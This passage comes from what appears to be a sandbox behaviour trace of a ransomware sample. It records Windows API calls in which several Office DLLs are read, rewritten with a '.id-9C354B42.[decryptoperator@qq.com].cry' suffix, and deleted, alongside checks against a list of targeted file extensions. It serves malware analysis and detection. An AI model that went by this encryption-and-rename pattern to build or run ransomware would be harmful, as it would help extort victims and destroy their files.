lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.181] SetEndOfFile (hFile=0x1f4) returned 1 [0053.181] CloseHandle (hObject=0x1f4) returned 1 [0053.181] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.181] SetEndOfFile (hFile=0x190) returned 1 [0053.182] CloseHandle (hObject=0x190) returned 1 [0053.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.184] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 1 [0053.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.184] lstrlenW (lpString=".doc") returned 4 [0053.184] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.184] lstrlenW (lpString=".docx") returned 5 [0053.184] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0053.184] lstrlenW (lpString=".pdf") returned 4 [0053.184] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.184] lstrlenW (lpString=".xls") returned 4 [0053.184] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.184] lstrlenW (lpString=".xlsx") returned 5 [0053.184] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0053.184] lstrlenW (lpString=".ppt") returned 4 [0053.184] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.184] lstrlenW (lpString=".zip") returned 4 [0053.184] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.184] lstrlenW (lpString=".rar") returned 4 [0053.185] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString=".bz2") returned 4 [0053.185] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.185] lstrlenW (lpString=".7z") returned 3 [0053.185] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.185] lstrlenW (lpString=".dbf") returned 4 [0053.185] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.185] lstrlenW (lpString=".1cd") returned 4 [0053.185] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.185] lstrlenW (lpString=".jpg") returned 4 [0053.185] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.185] lstrlenW (lpString=".doc") returned 4 [0053.185] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString=".docx") returned 5 [0053.185] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0053.185] lstrlenW (lpString=".pdf") returned 4 [0053.185] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString=".xls") returned 4 [0053.185] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString=".xlsx") returned 5 [0053.185] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0053.185] lstrlenW (lpString=".ppt") returned 4 [0053.185] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.185] lstrlenW (lpString=".zip") returned 4 [0053.185] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString=".rar") returned 4 [0053.185] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.185] lstrlenW (lpString=".bz2") returned 4 [0053.185] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.185] lstrlenW (lpString=".7z") returned 3 [0053.185] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.186] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.186] lstrlenW (lpString=".dbf") returned 4 [0053.186] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.186] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.186] lstrlenW (lpString=".1cd") returned 4 [0053.186] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.186] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0053.186] lstrlenW (lpString=".jpg") returned 4 [0053.186] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.186] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.186] lstrlenW (lpString="ACEWSTR.DLL") returned 11 [0053.186] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0053.187] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=862608) returned 1 [0053.187] CloseHandle (hObject=0x190) returned 1 [0053.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 0x20 [0053.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0053.187] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.187] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0053.194] GetLastError () returned 0x0 [0053.194] ReadFile (in: hFile=0x190, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xd2990, lpOverlapped=0x0) returned 1 [0053.304] WriteFile (in: hFile=0x1f4, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xd29a0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xd29a0, lpOverlapped=0x0) returned 1 [0053.318] ReadFile (in: hFile=0x190, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.319] WriteFile (in: hFile=0x1f4, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0053.319] SetEndOfFile (hFile=0x1f4) returned 1 [0053.340] CloseHandle (hObject=0x1f4) returned 1 [0053.340] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.340] SetEndOfFile (hFile=0x190) returned 1 [0053.415] CloseHandle (hObject=0x190) returned 1 [0053.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.416] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 1 [0053.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.416] lstrlenW (lpString=".doc") returned 4 [0053.416] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.416] lstrlenW (lpString=".docx") returned 5 [0053.416] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.416] lstrlenW (lpString=".pdf") returned 4 [0053.416] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.416] lstrlenW (lpString=".xls") returned 4 [0053.416] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.416] lstrlenW (lpString=".xlsx") returned 5 [0053.416] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.416] lstrlenW (lpString=".ppt") returned 4 [0053.416] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.416] lstrlenW (lpString=".zip") returned 4 [0053.416] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.416] lstrlenW (lpString=".rar") returned 4 [0053.416] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.416] lstrlenW (lpString=".bz2") returned 4 [0053.416] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.416] lstrlenW (lpString=".7z") returned 3 [0053.416] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.416] lstrlenW (lpString=".dbf") returned 4 [0053.416] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString=".1cd") returned 4 [0053.417] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString=".jpg") returned 4 [0053.417] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString=".doc") returned 4 [0053.417] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.417] lstrlenW (lpString=".docx") returned 5 [0053.417] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.417] lstrlenW (lpString=".pdf") returned 4 [0053.417] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.417] lstrlenW (lpString=".xls") returned 4 [0053.417] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.417] lstrlenW (lpString=".xlsx") returned 5 [0053.417] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.417] lstrlenW (lpString=".ppt") returned 4 [0053.417] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString=".zip") returned 4 [0053.417] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.417] lstrlenW (lpString=".rar") returned 4 [0053.417] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.417] lstrlenW (lpString=".bz2") returned 4 [0053.417] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.417] lstrlenW (lpString=".7z") returned 3 [0053.417] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString=".dbf") returned 4 [0053.417] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString=".1cd") returned 4 [0053.417] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0053.417] lstrlenW (lpString=".jpg") returned 4 [0053.417] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.418] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0053.418] lstrlenW (lpString="xlsrvintl.dll") returned 13 [0053.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.432] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=105344) returned 1 [0053.432] CloseHandle (hObject=0x230) returned 1 [0053.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 0x20 [0053.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.432] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.432] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.477] GetLastError () returned 0x0 [0053.477] ReadFile (in: hFile=0x230, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x19b80, lpOverlapped=0x0) returned 1 [0053.704] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x19b90, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x19b90, lpOverlapped=0x0) returned 1 [0053.706] ReadFile (in: hFile=0x230, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.706] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xee, lpOverlapped=0x0) returned 1 [0053.706] SetEndOfFile (hFile=0x20c) returned 1 [0053.706] CloseHandle (hObject=0x20c) returned 1 [0053.706] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.707] SetEndOfFile (hFile=0x230) returned 1 [0053.708] CloseHandle (hObject=0x230) returned 1 [0053.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.708] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 1 [0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.708] lstrlenW (lpString=".doc") returned 4 [0053.708] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0053.708] lstrlenW (lpString=".docx") returned 5 [0053.708] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0053.708] lstrlenW (lpString=".pdf") returned 4 [0053.708] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0053.708] lstrlenW (lpString=".xls") returned 4 [0053.708] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0053.709] lstrlenW (lpString=".xlsx") returned 5 [0053.709] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0053.709] lstrlenW (lpString=".ppt") returned 4 [0053.709] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.709] lstrlenW (lpString=".zip") returned 4 [0053.709] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0053.709] lstrlenW (lpString=".rar") returned 4 [0053.709] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0053.709] lstrlenW (lpString=".bz2") returned 4 [0053.709] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0053.709] lstrlenW (lpString=".7z") returned 3 [0053.709] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.709] lstrlenW (lpString=".dbf") returned 4 [0053.709] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.709] lstrlenW (lpString=".1cd") returned 4 [0053.709] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.709] lstrlenW (lpString=".jpg") returned 4 [0053.709] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.709] lstrlenW (lpString=".doc") returned 4 [0053.709] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0053.709] lstrlenW (lpString=".docx") returned 5 [0053.709] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0053.709] lstrlenW (lpString=".pdf") returned 4 [0053.709] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0053.709] lstrlenW (lpString=".xls") returned 4 [0053.709] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0053.710] lstrlenW (lpString=".xlsx") returned 5 [0053.710] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0053.710] lstrlenW (lpString=".ppt") returned 4 [0053.710] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0053.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.710] lstrlenW (lpString=".zip") returned 4 [0053.710] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0053.710] lstrlenW (lpString=".rar") returned 4 [0053.710] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0053.710] lstrlenW (lpString=".bz2") returned 4 [0053.710] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0053.710] lstrlenW (lpString=".7z") returned 3 [0053.710] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0053.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.710] lstrlenW (lpString=".dbf") returned 4 [0053.710] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0053.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.710] lstrlenW (lpString=".1cd") returned 4 [0053.710] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0053.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0053.710] lstrlenW (lpString=".jpg") returned 4 [0053.710] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0053.710] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.710] lstrlenW (lpString="ACEES.DLL") returned 9 [0053.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.773] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1012648) returned 1 [0053.773] CloseHandle (hObject=0x230) returned 1 [0053.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 0x20 [0053.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.773] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.774] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.774] GetLastError () returned 0x0 [0053.774] ReadFile (in: hFile=0x230, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xf73a8, lpOverlapped=0x0) returned 1 [0054.065] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xf73b0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf73b0, lpOverlapped=0x0) returned 1 [0054.079] ReadFile (in: hFile=0x230, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.079] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0054.079] SetEndOfFile (hFile=0x20c) returned 1 [0054.079] CloseHandle (hObject=0x20c) returned 1 [0054.079] SetFilePointerEx (in: hFile=0x230, 